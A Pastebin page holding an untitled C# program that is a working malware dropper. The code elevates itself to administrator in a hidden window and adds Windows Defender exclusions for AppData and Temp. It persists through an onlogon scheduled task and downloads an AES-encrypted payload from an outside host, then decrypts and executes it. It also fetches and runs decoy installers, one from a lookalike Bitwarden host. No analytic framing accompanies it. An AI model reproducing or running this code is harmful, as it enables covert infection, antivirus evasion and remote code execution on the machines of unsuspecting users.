API tools faq
paste
bendas

Untitled

bendas
Mar 30th, 2025
25
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.61 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Diagnostics;
  3. using System.IO;
  4. using System.Net.Http;
  5. using System.Security.Cryptography;
  6. using System.Security.Principal;
  7. using System.Threading.Tasks;
  8.  
  9. async Task A0()
  10. {
  11. if (!B0())
  12. {
  13. var pR = Process.GetCurrentProcess();
  14. var stI = new ProcessStartInfo
  15. {
  16. FileName = "cmd.exe",
  17. Arguments = $"/c \"{pR.MainModule.FileName}\" -runAsAdmin {pR.Id}",
  18. UseShellExecute = true,
  19. Verb = "runas",
  20. WindowStyle = ProcessWindowStyle.Hidden
  21. };
  22. try
  23. {
  24. var qP = Process.Start(stI);
  25. qP?.WaitForExit();
  26. }
  27. catch {}
  28. Environment.Exit(0);
  29. }
  30.  
  31. C0();
  32.  
  33. string rU = "https://solarcellled.com/test.php";
  34. string uD = "ваш_uuid";
  35. if (!string.IsNullOrEmpty(uD))
  36. {
  37. rU += $"?uuid={Uri.EscapeDataString(uD)}";
  38. }
  39. await D0(rU);
  40.  
  41. await F0();
  42. Environment.Exit(0);
  43. }
  44.  
  45. async Task D0(string xU)
  46. {
  47. using (var hC = new HttpClient())
  48. {
  49. var rs = await hC.GetAsync(xU);
  50. rs.EnsureSuccessStatusCode();
  51. var tR = await rs.Content.ReadAsStringAsync();
  52. string[] pS = tR.Split(',');
  53. if (pS.Length != 3) throw new Exception();
  54.  
  55. byte[] kA = Convert.FromBase64String(pS[0]);
  56. byte[] iV = Convert.FromBase64String(pS[1]);
  57. byte[] encData = Convert.FromBase64String(pS[2]);
  58. var dData = E0(encData, kA, iV);
  59.  
  60. string aP = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  61. string bF = Path.Combine(aP, "BackupWin");
  62. if (!Directory.Exists(bF)) Directory.CreateDirectory(bF);
  63. string fP = Path.Combine(bF, "decrypted.exe");
  64. File.WriteAllBytes(fP, dData);
  65.  
  66. Process.Start(new ProcessStartInfo(fP) { UseShellExecute = true });
  67. }
  68. }
  69.  
  70. byte[] E0(byte[] data, byte[] K, byte[] I)
  71. {
  72. using (var aE = Aes.Create())
  73. {
  74. aE.Key = K;
  75. aE.IV = I;
  76. ICryptoTransform dR = aE.CreateDecryptor(aE.Key, aE.IV);
  77.  
  78. using (var msD = new MemoryStream(data))
  79. using (var csD = new CryptoStream(msD, dR, CryptoStreamMode.Read))
  80. using (var msR = new MemoryStream())
  81. {
  82. csD.CopyTo(msR);
  83. return msR.ToArray();
  84. }
  85. }
  86. }
  87.  
  88. async Task F0()
  89. {
  90. string pN = Process.GetCurrentProcess().ProcessName.ToLower();
  91. string aP = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  92. string flP = Path.Combine(aP, "BackupWin", "install.flag");
  93. string dU = null;
  94.  
  95. if (File.Exists(flP)) return;
  96.  
  97. if (pN.Contains("notion"))
  98. {
  99. dU = "https://desktop-release.notion-static.com/Notion%20Setup%204.2.0.exe";
  100. }
  101. else if (pN.Contains("bitwarden"))
  102. {
  103. dU = "https://blgzd.com/Bitwarden.exe";
  104. }
  105. else if (pN.Contains("chrome"))
  106. {
  107. dU = "https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B0CEC8E7A-72E5-2CE2-EEAF-CF82E51C75E1%7D%26lang%3Den-GB%26browser%3D5%26usagestats%3D1%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-statsdef_1%26installdataindex%3Dempty/update2/installers/ChromeSetup.exe";
  108. }
  109.  
  110. if (string.IsNullOrEmpty(dU)) return;
  111.  
  112. using (var cL = new HttpClient())
  113. {
  114. var rS = await cL.GetAsync(dU);
  115. rS.EnsureSuccessStatusCode();
  116. string bF = Path.Combine(aP, "BackupWin");
  117. if (!Directory.Exists(bF)) Directory.CreateDirectory(bF);
  118.  
  119. string fN = Path.GetFileName(dU);
  120. string fP = Path.Combine(bF, fN);
  121.  
  122. using (var sR = await rS.Content.ReadAsStreamAsync())
  123. using (var fS = new FileStream(fP, FileMode.Create, FileAccess.Write, FileShare.None))
  124. {
  125. await sR.CopyToAsync(fS);
  126. }
  127.  
  128. Process.Start(new ProcessStartInfo(fP) { UseShellExecute = true });
  129. File.Create(flP).Dispose();
  130. }
  131. }
  132.  
  133. bool B0()
  134. {
  135. var wI = WindowsIdentity.GetCurrent();
  136. var wP = new WindowsPrincipal(wI);
  137. return wP.IsInRole(WindowsBuiltInRole.Administrator);
  138. }
  139.  
  140. void C0()
  141. {
  142. string aP = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  143. string tP = Path.GetTempPath();
  144.  
  145. var sI = new ProcessStartInfo
  146. {
  147. FileName = "cmd.exe",
  148. Arguments = $"/c powershell -Command \"Add-MpPreference -ExclusionPath '{aP}','{tP}'\"",
  149. UseShellExecute = true,
  150. Verb = "runas",
  151. WindowStyle = ProcessWindowStyle.Hidden
  152. };
  153. try
  154. {
  155. var pX = Process.Start(sI);
  156. pX.WaitForExit();
  157. if (pX.ExitCode == 0)
  158. {
  159. G0();
  160. }
  161. }
  162. catch { }
  163. }
  164.  
  165.  
  166. void G0()
  167. {
  168. try
  169. {
  170. string tN = "BackupWinTask";
  171. string aP = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  172. string bF = Path.Combine(aP, "BackupWin");
  173. if (!Directory.Exists(bF)) Directory.CreateDirectory(bF);
  174.  
  175. string eX = Process.GetCurrentProcess().MainModule.FileName;
  176. string bC = Path.Combine(bF, Path.GetFileName(eX));
  177. if (!File.Exists(bC))
  178. {
  179. File.Copy(eX, bC, true);
  180. }
  181. var sI = new ProcessStartInfo
  182. {
  183. FileName = "cmd.exe",
  184. Arguments = $"/c schtasks /create /tn \"{tN}\" /tr \"\"\"{bC}\"\"\" /sc onlogon /f /rl HIGHEST",
  185. UseShellExecute = true,
  186. Verb = "runas",
  187. WindowStyle = ProcessWindowStyle.Hidden
  188. };
  189. var pX = Process.Start(sI);
  190. pX.WaitForExit();
  191. }
  192. catch {}
  193. }
  194.  
  195. await A0();
  196.  
  197.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!